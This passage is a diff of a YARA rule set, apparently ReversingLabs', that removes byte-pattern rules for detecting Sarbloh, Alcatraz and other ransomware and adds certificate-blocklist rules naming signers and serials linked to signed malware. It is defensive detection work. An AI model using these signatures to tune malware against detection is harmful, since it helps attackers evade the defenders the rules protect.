?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? - ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? - ?? 48 C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? 48 FF C0 48 89 44 24 ?? 48 8D 8C - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 39 44 24 ?? 73 ?? 48 83 7C 24 ?? ?? 76 ?? 33 D2 - 48 8B 44 24 ?? B9 ?? ?? ?? ?? 48 F7 F1 48 8B C2 48 85 C0 75 ?? 41 B9 ?? ?? ?? ?? 4C - } - $encrypt_network_shares_win64_p3 = { - 8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 - 24 ?? 48 FF C0 48 89 44 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? - ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? - 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? - E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? - ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B - C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 90 32 C0 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? C3 - } - $find_files_win64 = { - 48 89 5C 24 ?? 55 56 57 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 - C4 48 89 84 24 ?? ?? ?? ?? 4D 8B F0 49 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B E9 48 3B D1 - 74 ?? 0F B7 02 66 83 E8 ?? 66 83 F8 ?? 77 ?? 0F B7 C0 49 0F A3 C0 72 ?? 48 83 EA ?? - 48 3B D5 75 ?? 0F B7 0A 66 83 F9 ?? 75 ?? 48 8D 45 ?? 48 3B D0 74 ?? 4D 8B CE 45 33 - C0 33 D2 48 8B CD E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 83 E9 ?? 33 FF 66 83 F9 ?? 77 ?? - 0F B7 C1 49 0F A3 C0 B0 ?? 72 ?? 40 8A C7 48 2B D5 48 8D 4C 24 ?? 48 D1 FA 41 B8 ?? - ?? ?? ?? 48 FF C2 F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? - 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CD FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? - 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CD E8 ?? ?? ?? ?? 8B F8 48 83 FB ?? 74 ?? 48 8B - CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C - 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F 5E 5D C3 49 8B 76 ?? 49 2B 36 48 - C1 FE ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 7C 24 ?? 74 ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 - 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D5 E8 ?? ?? ?? ?? 85 C0 75 ?? - 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 49 8B 56 ?? 48 2B D0 - 48 C1 FA ?? 48 3B F2 0F 84 ?? ?? ?? ?? 48 2B D6 48 8D 0C F0 4C 8D 0D ?? ?? ?? ?? 41 - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 - } - condition: - uint16(0)==0x5A4D and ($find_files_win64) and ( all of ($encrypt_files_win64_p*)) and ( all of ($encrypt_network_shares_win64_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="17:2f:ea:8c:b0:6f:fc:ed:6b:fa:c7:f2:f6:b7:77:54" and 1467936000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Sarbloh : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE { meta: - description = "Yara rule that detects Sarbloh ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "532abd77-f091-5c54-87a3-7e8be5253efd" - date = "2021-05-21" - modified = "2021-05-21" + id = "5c35c73e-e4f6-5707-ad91-1db7c0a0ec81" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sarbloh.yara#L1-L88" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7259aa9d1fe657db220ee50f1610e6439ff61673d92f46ebc3b8cadd990f002c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17070-L17086" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d232923ed962fbf4a9a30890778c2380d6c6967a693c6f77c2f558bb4347e60e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sarbloh" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 75 ?? 72 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? - ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 75 - ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? C1 E6 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? - 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B - 8D ?? ?? ?? ?? 8B C1 8B 55 ?? 0B C2 89 4D ?? 89 55 ?? 0F 84 ?? ?? ?? ?? 0F 57 C0 66 - 0F 13 45 ?? 85 D2 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? - 8B 45 ?? 89 45 ?? EB ?? 8B 75 ?? 8B 7D ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? - 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 89 4D ?? 89 45 ?? - 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 - ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 6A ?? 6A ?? 56 8B 75 ?? - 8D 45 ?? 56 50 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 0F - 85 ?? ?? ?? ?? 8B 75 ?? EB ?? 33 F6 8B 45 ?? 8B 4D ?? 89 75 ?? 89 4D ?? 89 45 ?? 85 - C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? - ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 FF 85 C0 0F 88 ?? ?? ?? ?? 85 F6 0F 84 - } - $encrypt_files_p2 = { - 8B 75 ?? 8D 45 ?? 56 50 53 52 6A ?? 52 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 53 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? - FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 4D ?? - 81 C7 ?? ?? ?? ?? 3B 7D ?? 72 ?? 8B 75 ?? 03 75 ?? 8B 45 ?? 83 D0 ?? 89 75 ?? 89 45 - ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B B5 ?? ?? ?? ?? 8B 75 ?? 0F 82 ?? ?? ?? ?? 8D - 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 6A ?? 1B DB 8D 45 - ?? 23 5D ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? - F7 D8 1B F6 23 75 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 - 85 FF 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 - ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 57 8D 45 ?? 50 6A ?? 6A - ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 39 75 ?? 75 ?? - 8B 85 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 6A ?? 89 85 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 8D 45 ?? 89 9D ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 89 B5 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 33 C0 B9 ?? ?? ?? ?? 83 - 7D ?? ?? 0F 44 C1 89 45 ?? 89 7D ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 03 4D ?? 39 4D ?? 73 - ?? 90 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 57 6A ?? FF 15 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 8B 75 ?? EB - } - $find_files_p1 = { - 55 8B EC 83 EC ?? 53 56 8B 75 ?? 57 8B F9 83 3E ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D - 45 ?? 50 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 89 45 ?? 8D - 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0F 89 4D ?? 85 C0 78 ?? - 83 F9 ?? 74 ?? FF 75 ?? BB ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 8B 55 ?? EB ?? FF 75 ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8B 17 33 DB 89 55 ?? C7 45 - ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 39 4D ?? 73 - } - $find_files_p2 = { - 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 53 6A ?? 6A ?? 6A ?? 68 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B F8 33 DB - 89 5D ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 85 FF 78 ?? 8B 4D ?? 8B 35 ?? - ?? ?? ?? 2B CB 0F 84 ?? ?? ?? ?? 83 E9 ?? 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1 - C1 E8 ?? F7 D0 A8 ?? 74 ?? F7 C1 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 74 ?? 83 FE - ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 C0 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABDULKADIR SAHIN" and pe.signatures[i].serial=="3e:e5:0b:b9:8f:ad:ca:2d:66:2a:09:20:e7:66:85:a2" and 1330041600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Alcatraz : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE { meta: - description = "Yara rule that detects Alcatraz ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7ff37483-ae63-5c82-a355-81ef68e2f663" - date = "2020-07-28" - modified = "2020-07-28" + id = "2009c47b-8a15-50fd-a229-5e34244ede1f" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Alcatraz.yara#L1-L91" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ddd35c8da0c08bce17cacfba8bb8a8b8a8c08c3e59261a88a79c63b03d29000f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17088-L17104" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "22ad68974a1c6729da369c26372ba93c25ddf68df880580c727bf2d3ee2d3a86" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Alcatraz" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A - ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 - ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? - ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 - BD ?? ?? ?? ?? ?? 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? - ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? - ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 - ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? - ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 D0 85 D2 75 ?? 83 7D ?? ?? 74 ?? 6A - ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? - 75 ?? 83 C8 ?? EB ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? - ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? - 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_server = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? - ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A - ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D - ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 - ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 - ?? 83 C8 ?? E9 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 - 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 C2 ?? 52 6A ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF 15 - ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B - 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 3B 45 ?? 73 ?? 8B 4D ?? 03 4D ?? 0F BE 11 83 FA ?? - 74 ?? 8B 45 ?? 03 45 ?? 0F BE 08 83 F9 ?? 74 ?? 8B 55 ?? 03 55 ?? 8B 45 ?? 03 45 ?? - 8A 08 88 0A EB ?? 8B 55 ?? 03 55 ?? C6 02 ?? EB ?? EB ?? EB ?? 83 7D ?? ?? 0F 87 ?? - ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 - FF 15 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_server_2 = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 89 45 ?? A1 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 - A1 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 0D ?? ?? ?? ?? 51 68 - ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? - 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? - ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 68 - ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 55 ?? - 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D - 45 ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8B 55 ?? 83 - C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 - C0 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 - C0 EB ?? EB ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8B 4D ?? - 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 0F 87 ?? - ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? - ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 - FF 15 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and $encrypt_files and $remote_server and $remote_server_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x9D\\xA8\\xE6\\xB7\\x87\\xE6\\x99\\xBA" and pe.signatures[i].serial=="21:bf:dd:b6:a6:64:35:d1:ad:ce:2c:eb:23:ed:7c:9a" and 1395297334<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Kawaiilocker : TC_DETECTION MALICIOUS MALWARE 